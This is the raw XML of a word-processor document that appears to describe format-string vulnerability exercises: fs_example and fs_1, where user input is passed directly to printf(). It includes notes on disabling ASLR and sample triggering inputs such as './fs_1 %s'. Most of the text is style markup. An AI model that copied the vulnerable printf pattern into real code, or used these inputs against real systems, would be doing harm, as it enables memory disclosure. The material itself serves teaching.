        <w:t>md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve"> contains how to compile the .c and turn off ASLR for Linux.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
        <w:t>fs_example:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve"> This is meant to be an example that shows very simply what happens when you provide more format specifiers than parameters.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
        <w:t>./fs_example</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
        <w:t>fs_1:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve"> The vulnerability here is that a user-specified argument is passed directly to a printf() rather than by passing it as a parameter. Should be: printf(“%s”,arg[1]) but it is actually printf(arg[1]). Characters are not escaped, but instead “parameters” are taken off the stack.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
        <w:t>./fs_1 &lt;anything containing %s&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
        <w:t>./fs_1 hello_%s</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
        <w:t>./fs_1 %s</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pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:lineRule="auto" w:line="240" w:before="200" w:after="0"/>
      <w:contextualSpacing/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:eastAsia="Trebuchet MS" w:cs="Trebuchet MS"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="Heading 2"/>
    <w:basedOn w:val="Normal1"/>
    <w:next w:val="Normal"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:lineRule="auto" w:line="240" w:before="200" w:after="0"/>
      <w:contextualSpacing/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:eastAsia="Trebuchet MS" w:cs="Trebuchet MS"/>
      <w:b/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="Heading 3"/>
    <w:basedOn w:val="Normal1"/>
    <w:next w:val="Normal"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:lineRule="auto" w:line="240" w:before="160" w:after="0"/>
      <w:contextualSpacing/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:eastAsia="Trebuchet MS" w:cs="Trebuchet MS"/>
      <w:b/>
      <w:color w:val="666666"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading4">
    <w:name w:val="Heading 4"/>
    <w:basedOn w:val="Normal1"/>
    <w:next w:val="Normal"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:lineRule="auto" w:line="240" w:before="160" w:after="0"/>
      <w:contextualSpacing/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:eastAsia="Trebuchet MS" w:cs="Trebuchet MS"/>
      <w:color w:val="666666"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading5">
    <w:name w:val="Heading 5"/>
    <w:basedOn w:val="Normal1"/>
    <w:next w:val="Normal"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:lineRule="auto" w:line="240" w:before="160" w:after="0"/>
      <w:contextualSpacing/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:eastAsia="Trebuchet MS" w:cs="Trebuchet MS"/>
      <w:color w:val="666666"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading6">
    <w:name w:val="Heading 6"/>
    <w:basedOn w:val="Normal1"/>
    <w:next w:val="Normal"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:lineRule="auto" w:line="240" w:before="160" w:after="0"/>
      <w:contextualSpacing/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:eastAsia="Trebuchet MS" w:cs="Trebuchet MS"/>
      <w:i/>
      <w:color w:val="666666"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="2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pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
      <w:contextualSpacing/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:eastAsia="Trebuchet MS" w:cs="Trebuchet MS"/>
      <w:sz w:val="42"/>
      <w:szCs w:val="42"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Subtitle">
    <w:name w:val="Subtitle"/>
    <w:basedOn w:val="Normal1"/>
    <w:next w:val="Normal"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="200"/>
      <w:contextualSpacing/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:eastAsia="Trebuchet MS" w:cs="Trebuchet MS"/>
      <w:i/>
      <w:color w:val="666666"/>
      <w:sz w:val="26"/>
      <w:szCs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